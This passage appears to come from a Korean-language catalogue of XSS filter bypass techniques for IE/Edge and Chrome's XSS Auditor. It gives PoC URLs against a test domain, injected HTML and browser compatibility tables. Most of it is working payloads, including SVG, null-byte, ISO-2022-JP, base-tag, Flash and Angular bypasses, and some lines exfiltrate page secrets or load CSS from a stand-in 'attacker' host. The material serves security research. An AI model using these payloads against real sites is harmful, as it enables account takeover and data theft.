\uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5) IE\/Edge\uc758 XSS \ud544\ud130 \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS \uc644\uc804\ud55c DOM based XSS 2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0 \ubb38\uc790\uc5f4 \uc870\uc791\uc774 \uc788\ub294 \uacbd\uc6b0 \uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0 \uce58\ud658\ub418\ub294 \uacbd\uc6b0 \uc678\ubd80\uc5d0 \uc694\uccad\uc744 \ubcf4\ub0bc \uc218 \uc788\ub294 \ud0dc\uadf8 \ud544\ud130 \uc6b0\ud68c XML namespace\ub85c \uc704\uc7a5\ud55c \ubb38\uc790\uc5f4 \uc0ac\uc6a9 HZ-GB-2312 \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9 \ud398\uc774\uc9c0 \uc774\ub3d9\uc2dc\uc758 \uc778\ucf54\ub529 \ub3d9\uc791\uc758 \uc774\uc6a9 Adobe Acrobat Reader \ud50c\ub7ec\uadf8\uc778\uc744 \uc0ac\uc6a9 XML\uc744 \uc774\uc6a9\ud55c Content Sniffing UTF-7 BOM\uc744 \uc0ac\uc6a9 &lt;?PXML>\uc744 \uc0ac\uc6a9 referer\ub97c \uc0ac\uc6a9 \uac19\uc740 \ub3c4\uba54\uc778(\uc11c\ube0c\ub3c4\uba54\uc778 \ud3ec\ud568) \ub0b4\uc5d0 \uc788\ub294 \ub9c1\ud06c \uc0ac\uc6a9 2\uc911\uc73c\ub85c \ub9c1\ud06c\ub97c \uac78\uc5b4 referer \uc0dd\uc131 \ucde8\uc57d\ud55c form\uc758 \uc804\uc1a1 \uc774\uc804\uc758 \uc0c1\ud0dc\ub97c \uc870\uc791 \uac00\ub2a5\ud55c \uacbd\uc6b0 option\ud0dc\uadf8\uc758 \uc0ac\uc6a9 \ube44\uc5b4\uc788\ub294 iframe\ud0dc\uadf8\uc758 \uc0ac\uc6a9 formaction\uc758 \uc0ac\uc6a9 (\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5) CSS\uc758 \ucc38\uc870 \uad6c\ubb38 \uc774\uc6a9(CSS \uac12 \uc870\uc791 \uac00\ub2a5\uc2dc) XSS Auditor \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83 \ucc98\uc74c\ubd80\ud130 \ud544\ud130\ub9c1\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\ub294 \uc0c1\ud669\uc5d0\uc11c\ub294 \ubcc4\ub2e4\ub978 \uc870\uc791\uc5c6\uc774 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc774 \uac00\ub2a5\ud568 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Balert(1)\/\/ &lt;script&gt;var q=&#8221;&#8221;;alert(1)\/\/&#8221;&lt;\/script&gt; O O X X O O URL \ub2e8\ub3c5\uc73c\ub85c \uc131\ub9bd\ud558\ub294 XSS(\uc785\ub825\uac12\uc774 a\ud0dc\uadf8\uc758 href\uc18d\uc131\uc5d0 \uc9c1\uc811 \ub4e4\uc5b4\uac00\ub294 \uacbd\uc6b0) https:\/\/vulnerabledoma.in\/bypass\/link?q=javascript:alert(1) &lt;a href=&#8221;javascript:alert(1)&#8221;&gt;Link&lt;\/a&gt; O O X X O O 2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0 (\ucc28\ub2e8\ud560 \uc218 \uc788\uc744\uac83\uc73c\ub85c \ubcf4\uc774\uc9c0\ub9cc, \uacfc\uac70\uc5d0 \ubcf4\uace0\ub41c \ucf00\uc774\uc2a4\uc5d0\uc11c ( #96616&nbsp;#403636 ) Will not Fix \ub97c \ubc1b\uc558\uae30\uc5d0, \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83\uc73c\ub85c \ubd84\ub958\ud568) https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%60-alert(1)%3C\/script%3E%3Cscript%3E%60 &lt;div&gt;`-alert(1)&lt;\/script&gt;&lt;script&gt;`&lt;\/div&gt; &lt;div&gt;`-alert(1)&lt;\/script&gt;&lt;script&gt;`&lt;\/div&gt; O O X X O O \ubb38\uc790\uc5f4\uc774 \uc870\uc791\ub418\ub294 \uacbd\uc6b0 \uc77c\ubd80 \ubb38\uc790\uc5f4\uc774 \uc0ad\uc81c\ub418\uac70\ub098 \uce58\ud658\ub420 \ub54c \ud574\ub2f9 \ubb38\uc790\uc5f4\uc744 \ud398\uc774\ub85c\ub4dc \uc0ac\uc774\uc5d0 \ub123\uc5b4 \ucc28\ub2e8\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c \uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0 https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E &lt;svg o&lt;script&gt;nload=alert(1)&gt; \u2193 &lt;svg onload=alert(1)&gt; O O O O O O \uce58\ud658\ub418\ub294 \uacbd\uc6b0 https:\/\/vulnerabledoma.in\/bypass\/text?type=7&amp;q=%3Cscript%3E\/%26\/-alert(1)%3C\/script%3E &lt;script&gt;\/&amp;\/-alert(1)&lt;\/script&gt; \u2193 &lt;script&gt;\/&amp;amp;\/-alert(1)&lt;\/script&gt; O O X X O O Request\uac12\uc744 document.write() \ud558\ub294 \uacbd\uc6b0\ub97c \uc81c\uc678\ud55c DOM based XSS https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E &lt;body&gt; &lt;script&gt; hash=location.hash.slice(1); document.body.innerHTML=decodeURIComponent(hash); &lt;\/script&gt; &lt;\/body&gt; O O O O O O https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1) &lt;script&gt; location.href=decodeURIComponent(location.hash.slice(1)); &lt;\/script&gt; O O O O O O XML \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 XSS https:\/\/vulnerabledoma.in\/bypass\/xml?q=%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E &lt;?xml version=&#8221;1.0&#8243;?&gt;&lt;html&gt;&lt;script xmlns=&#8221;http:\/\/www.w3.org\/1999\/xhtml&#8221;&gt;alert(1)&lt;\/script&gt;&lt;\/html&gt; O O O O O O \ud639\uc740 \ud398\uc774\uc9c0\uc758 \uac00\uc7a5 \uc55e\uc5d0 \ubb38\uc790\uc5f4\uc744 \uc4f8 \uc218 \uc788\uc73c\uba70, Content-Type\uc774 text\/html\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uace0, Content Sniffing\uc774 \uac00\ub2a5\ud55c \uacbd\uc6b0\uc5d0\ub3c4 \uc6b0\ud68c\uac00 \uac00\ub2a5 https:\/\/vulnerabledoma.in\/bypass\/text?mime=unknown&amp;q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E &lt;?xml version=&#8221;1.0&#8243;?&gt;&lt;script xmlns=&#8221;http:\/\/www.w3.org\/1999\/xhtml&#8221;&gt;alert(1)&lt;\/script&gt; O O X X O O \ub2e4\uc74c\uc740 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc740 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc \uc545\uc6a9\uc758 \uac00\ub2a5\uc131\uc774 \uc874\uc7ac\ud558\ub294 \uae30\ubc95\uc784 http(s):\ub9c1\ud06c \ub9cc\ub4e4\uae30 https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Ca%20href=https:\/\/attacker\/%3ESession%20expired.%20Please%20login%20again.%3C\/a%3E &lt;a href=https:\/\/attacker\/&gt;Session expired. Please login again.&lt;\/a&gt; O O X X O O \uc678\ubd80\ub85c Request\ub97c \ub9cc\ub4e4 \uc218 \uc788\ub294 \ud0dc\uadf8 \ub530\uc74c\ud45c \ud55c\ucabd\uc744 \ub2eb\uc9c0 \uc54a\uc740 img \ud0dc\uadf8\ub97c \uc774\uc6a9\ud574 \uc678\ubd80\ub85c Request\ub97c \ud560 \ub54c \uadf8 \ub0b4\uc6a9\uc5d0 \ube44\ubc00 \uc815\ubcf4\ub97c \ud3ec\ud568\uc2dc\ud0ac \uc218 \uc788\uc74c https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data= &lt;p&gt;&lt;img src=&#8221;https:\/\/attacker\/?data=&lt;\/p&gt; &lt;p&gt;This is a secret text.&lt;\/p&gt; &lt;p id=&#8221;x&#8221;&gt;AAA&lt;\/p&gt; O O O O O O \uc784\uc758\uc758 CSS \uc2e4\ud589 \ud398\uc774\uc9c0\uc758 \ub0b4\uc6a9\uc744 \ubaa8\ubc29\ud560 \ubfd0\ub9cc \uc544\ub2c8\ub77c \ud398\uc774\uc9c0 \ub0b4\uc5d0 \uc911\uc694\ud55c \uc815\ubcf4\uac00 \ub2f4\uaca8\uc788\uc744 \ub54c CSS\ub9cc\uc744 \uc0ac\uc6a9\ud574 \uc815\ubcf4\ub97c \ud0c8\ucde8\ud560 \uc218 \uc788\uc74c \uc790\uc138\ud55c \ub0b4\uc6a9\uc740 URL \ucc38\uace0. \ucc38\uace0URL: http:\/\/www.businessinfo.co.uk\/labs\/talk\/The_Sexy_Assassin.ppt https:\/\/masatokinugawa.l0.cm\/2015\/10\/css-based-attack-abusing-unicode-range.html https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cstyle%3E@import%20%27\/\/attacker\/test.css%27%3C\/style%3E &lt;style&gt;@import &#8216;\/\/attacker\/test.css'&lt;\/style&gt; O O X X O O https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=stylesheet%20href=\/\/attacker\/test.css%3E &lt;link rel=stylesheet href=\/\/attacker\/test.css&gt; O O X X O O \ud544\ud130 \uc6b0\ud68c SVG \uc560\ub2c8\uba54\uc774\uc158 \ud6a8\uacfc\uc758 values \uc18d\uc131\uc744 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ucc38\uace0URL: https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=709365 https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=738017 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%20xmlns:xlink=http:\/\/www.w3.org\/1999\/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink:href%22%20values=%22%26%23&#215;3000%3Bjavascript:alert(1)%22%20\/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20\/%3E%3C\/a%3E &lt;svg xmlns:xlink=http:\/\/www.w3.org\/1999\/xlink&gt;&lt;animate xlink:href=#x attributeName=&#8221;xlink:href&#8221; values=&#8221;\u3000javascript:alert(1)&#8221; \/&gt;&lt;a id=x&gt;&lt;rect width=100 height=100 \/&gt;&lt;\/a&gt; X O X X X O FireFox\uc5d0\uc11c\ub294 values=&#8221;javascript:alert(1)&#8221; \ub85c \uc8fc\uba74 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568 \uc5ec\ub7ec\uac1c\uc758 null\ubb38\uc790\ub97c \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac null \ubc14\uc774\ud2b8\uac00 \ucd9c\ub825\uc774 \ub428 \ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \uc55e\uc5d0 \uacf5\ubc31\ubb38\uc790\uac00 \uc874\uc7ac\ud558\uc9c0 \uc54a\uc74c \ucc38\uace0URL: https:\/\/twitter.com\/0rbz_\/status\/896896095862669312 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C\/script%3E [0x00][0x00][0x00][0x00][0x00][0x00][0x00]&lt;script&gt;alert(1)&lt;\/script&gt; X O X X X O script\ud0dc\uadf8\uc758 &#8211;&gt; \uc8fc\uc11d\uc744 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ud398\uc774\ub85c\ub4dc\uc758 \ub4a4\uc5d0 \uac1c\ud589\ubb38\uc790\uac00 \uc5c6\uc774 script\ud0dc\uadf8\ub97c \ub2eb\uc74c \ucc38\uace0URL: https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=753307 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cscript%3Ealert(1)%0A&#8211;%3E &lt;div&gt;&lt;script&gt;alert(1) &#8211;&gt;&lt;\/div&gt;&lt;script src=\/test.js&gt;&lt;\/script&gt; X O X X X O \uc5b4\uc911\uac04\ud55c base \ud0dc\uadf8\uc758 \uc0ac\uc6a9 Flash \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\ubb38\uc790 \ud639\uc740 &#8216;, &#8221; \uac00 \uc874\uc7ac \uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5 \ucc38\uace0URL: https:\/\/masatokinugawa.l0.cm\/2016\/05\/xss8.html PoC: (\ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\uc774 \uc5c6\ub294 \uacbd\uc6b0)https:\/\/vulnerabledoma.in\/bypass\/text?type=3&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=\/\/l0.cm\/ &lt;div&gt;&lt;embed allowscriptaccess=always src=\/xss.swf&gt;&lt;base href=\/\/l0.cm\/&lt;\/div&gt; X X X X X O (\ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\uc774 \uc788\ub294 \uacbd\uc6b0)https:\/\/vulnerabledoma.in\/bypass\/text?type=4&amp;q=%3Cembed%20allowscriptaccess=always%20src=\/xss.swf%3E%3Cbase%20href=%22\/\/l0.cm\/ &lt;div&gt; &lt;embed allowscriptaccess=always src=\/xss.swf&gt;&lt;base href=&#8221;\/\/l0.cm\/ &lt;\/div&gt;&lt;div id=&#8221;x&#8221;&gt;&lt;\/div&gt; X X X X X O \uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uacf5\ubc31\ubb38\uc790 \ud639\uc740 &#8216;, &#8220;\uac00 \uc874\uc7ac \ud398\uc774\ub85c\ub4dc\uc758 \ubc14\ub85c \ub4a4\uc5d0 \uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud568 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?type=9&amp;q=%3Cbase%20href=\/\/cors.l0.cm\/ &lt;div&gt;&lt;base href=\/\/cors.l0.cm\/&lt;\/div&gt;&lt;script src=\/test.js&gt;&lt;\/script&gt; X O X X X O ISO-2022-JP \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \ud398\uc774\uc9c0\uc5d0 \uc5b8\uc5b4\uc14b \uc9c0\uc815\uc774 \uc5c6\uc74c \ubcf4\ucda9: ISO-2022-JP\uc758 HTML \uc911\uc5d0\uc11c [0x1B](B\u3001[0x1B](H\u3001[0x1B](J\ub77c\ub294 \ubb38\uc790\uc5f4\uc740 \ubb34\uc2dc\ub428. \uc774\uac83\uc744 \uc774\ubca4\ud2b8\ud578\ub4e4\ub7ec \uc0ac\uc774\uc5d0 \ub07c\uc6cc\ub123\uc74c\uc73c\ub85c\uc368 \uc6b0\ud68c\uac00 \uac00\ub2a5.\ub610, Chrome\/Safari\uc5d0\uc11c\ub294 [0x1B]$@[0x0A]\ub77c\ub294 \ubb38\uc790\uc5f4\uc774 [0x0A]\uc640 \uac19\uac8c \ucde8\uae09\ub418\uc9c0\ub9cc, XSS Auditor\ub294 \ud574\uc11d\ud558\uc9c0 \ubabb\ud558\uc5ec \uc6b0\ud68c\uac00 \uac00\ub2a5. \ucc38\uace0URL: https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=114941 https:\/\/l0.cm\/encodings\/test3\/ PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E &lt;meta charset=iso-2022-jp&gt;&lt;svg o[0x1B](Bnload=alert(1)&gt; O O X X O O (\u203b $\uae30\ud638\uac00 \uc784\uc758\ub85c \uc778\ucf54\ub529\ub418\uc5b4 \uc758\ub3c4\ub300\ub85c \ub3d9\uc791\ud558\uc9c0 \uc54a\uae30 \ub54c\ubb38\uc5d0 $\ub97c \ud3ec\ud568\ud558\ub294 \ubc29\ubc95\uc73c\ub85c \uc6b0\ud68c\uac00 \uac00\ub2a5) https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0A%3C\/script%3E https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$B%0A%3C\/script%3E https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C\/script%3E https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C\/script%3E &lt;meta charset=iso-2022-jp&gt;&lt;script&gt;alert(1)[0x1B]$@[0x0A]&lt;\/script&gt; O X X X O O \ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9 XSS Auditor\ub294 \ucffc\ub9ac\uac00 \ud3ec\ud568\ub418\uc9c0 \uc54a\uc740 \ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc73c\ub85c\ubd80\ud130\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9\uc744 \ucc28\ub2e8\ud558\uc9c0 \uc54a\uc74c\ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc5d0 \uacf5\uaca9\uc5d0 \ud544\uc694\ud55c \ud30c\uc77c\uc744 \uc5c5\ub85c\ub4dc \ud560 \uc218 \uc788\uc744 \uacbd\uc6b0\uc5d0 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud55c \ucf00\uc774\uc2a4\uac00 \uc874\uc7ac\ud568 Path\ub97c \uc0ac\uc6a9\ud55c XSS \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uc694\uccad\ud558\ub294 \ud398\uc774\uc9c0\uc758 \uc8fc\uc18c\uc5d0 \ucffc\ub9ac\uac00 \ud3ec\ud568\ub418\uc9c0 \uc54a\uc74c PoC: https:\/\/vulnerabledoma.in\/bypass\/path\/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E PATH_INFO:\/&lt;link rel=import href=&#8221;\/bypass\/path\/&lt;script&gt;alert(1)&lt;\/script&gt;&#8221;&gt; O X X X O X \ud30c\uc77c \uc5c5\ub85c\ub4dc \uae30\ub2a5 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uc0ac\uc6a9\uc790\uac00 \uc5c5\ub85c\ub4dc\ud55c \ud30c\uc77c\uc774 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 \uc5c5\ub85c\ub4dc \ub428 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=\/bypass\/usercontent\/xss.js%3E%3C\/script%3E &lt;script src=\/bypass\/usercontent\/xss.js&gt;&lt;\/script&gt; O O X X O O https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/usercontent\/icon.jpg%3E &lt;link rel=import href=\/bypass\/usercontent\/icon.jpg&gt; O X X X O X Flash\uc640 flashvars\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 ExternalInterface.call() \ud568\uc218\uc5d0 \uc774\uc2a4\ucf00\uc774\ud504 \ub418\uc9c0 \uc54a\uc740 \ubb38\uc790\uc5f4\uc744 \ud30c\ub77c\ubbf8\ud130\ub85c \ub118\uaca8\uc8fc\ub294 Flash\uac00 \uc874\uc7ac \uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5 \ubcf4\ucda9: flashvars\uc18d\uc131\uc744 \uc0ac\uc6a9\ud558\uba74, Flash\uc5d0\uc11c \ud30c\ub77c\ubbf8\ud130\ub97c \ubd80\uc5ec\ud558\uc9c0 \uc54a\uc544\ub3c4 \ud30c\ub77c\ubbf8\ud130\uac00 \uc804\uc1a1\ub428(= Flash\uc5d0\uc11c\ub294 XSS \ub300\ucc45\uc758 \uc77c\ud658\uc73c\ub85c URL\uc5d0 \uc9c1\uc811 \ud30c\ub77c\ubbf8\ud130\ub97c \ub118\uae30\ub294 \uac83\uc774 \uc81c\ud55c\ub418\uc5b4 \uc788\uc9c0\ub9cc, flashvars\ub97c \uc0ac\uc6a9\ud558\ub294 \uacbd\uc6b0\uc5d0\ub294 \uac00\ub2a5\ud568)\ub610\ud55c, Content-Security-Policy: default-src &#8216;self&#8217;\uc640 \uac19\uc740 CSP\uac00 \uc124\uc815\ub418\uc5b4 \uc788\ub294 \uacbd\uc6b0, CSP\uc758 \uc6b0\ud68c\uc5d0\ub3c4 \uc0ac\uc6a9\uc774 \uac00\ub2a5\ud568 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\\%22)-(alert=alert(1)))}catch(e){}\/\/%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E &lt;embed name=a flashvars=&#8217;autoplay=true&amp;file=&#8221;})\\&#8221;)-(alert=alert(1)))}catch(e){}\/\/&#8217;allowscriptaccess=always src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf&gt; O O X X O O ActionScript: ExternalInterface.call(&#8220;setTimeout&#8221;, ExternalInterface.objectID + &#8216;_event&#8217; + &#8220;(&#8216;&#8221; + eventName + &#8220;&#8216;,&#8221; + eventValues + &#8220;)&#8221;, 0); Flash\uc640 ExternalInterface.objectID\uc640 ExternalInterface.call()\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 ExternalInterface.objectID\uc640ExternalInterface.call()\uc73c\ub85c \ub118\uaca8\uc9c0\ub294 Flash\uac00 \uc874\uc7ac \uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5 \ubcf4\ucda9: \ud50c\ub798\uc2dc\ub97c embed\ud560 \ub54c \ud574\ub2f9 \ud0dc\uadf8\uc758 name \uc18d\uc131\uc774 ExternalInterface.objectID \uac12\uc73c\ub85c \uc124\uc815\ub428\ub2e8\ub3c5\uc73c\ub85c\ub294 XSS\uac00 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc, \uc6b0\ud68c\uc5d0 \uc545\uc6a9\ub420 \uc218 \uc788\uc74cContent-Security-Policy: default-src &#8216;self&#8217;\uc640 \uac19\uc740 CSP\uac00 \uc124\uc815\ub418\uc5b4 \uc788\ub294 \uacbd\uc6b0, CSP\uc758 \uc6b0\ud68c\uc5d0\ub3c4 \uc0ac\uc6a9\uc774 \uac00\ub2a5\ud568 PoC: https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E &lt;embed name=&#8217;alert(1)-&#8216; allowscriptaccess=always src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf&gt; O O X X O O ActionScript: ExternalInterface.call(ExternalInterface.objectID + &#8216;_init&#8217;); Angular\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 Angular \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Angular\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac \ubcf4\ucda9: Angular\ub294 ng-app\uc774\ub77c\ub294 \uc18d\uc131\uc744 \uac16\ub294 \ud0dc\uadf8 \ub0b4\ubd80\uc5d0\uc11c {{}}\ub85c \uac10\uc2f8\uc9c4 \ud15c\ud50c\ub9bf\uc744 \ub80c\ub354\ub9c1 \ud568. \uc774 \ub54c \ud15c\ud50c\ub9bf\uc740 \uc790\ubc14\uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc2e4\ud589\ud568 \ucc38\uace0URL: https:\/\/blog.portswigger.net\/2016\/01\/xss-without-html-client-side-template.html PoC: https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=%22\/js\/angular1.6.4.min.js%22%3E%3C\/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}} &lt;script src=&#8221;\/js\/angular1.6.4.min.js&#8221;&gt;&lt;\/script&gt;&lt;p ng-app&gt;{{constructor.constructor(&#8216;alert(1)&#8217;)()}} O O X X O O \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Angular\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc788\ub2e4\uba74, HTML Imports\ub85c\ubd80\ud130 \uc678\ubd80 \ub9ac\uc18c\uc2a4\ub97c \uac04\uc811\uc801\uc73c\ub85c \ub85c\ub4dc\ud560 \uc218 \uc788\uc74c https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}} &lt;link rel=import href=angular.html&gt;&lt;p ng-app&gt;{{constructor.constructor(&#8216;alert(1)&#8217;)()}} O X X X O X Vue.js\uc758 \uc0ac\uc6a9 \uacf5\uaca9 \uac00\ub2a5 \uc870\uac74: \uc784\uc758\uc758 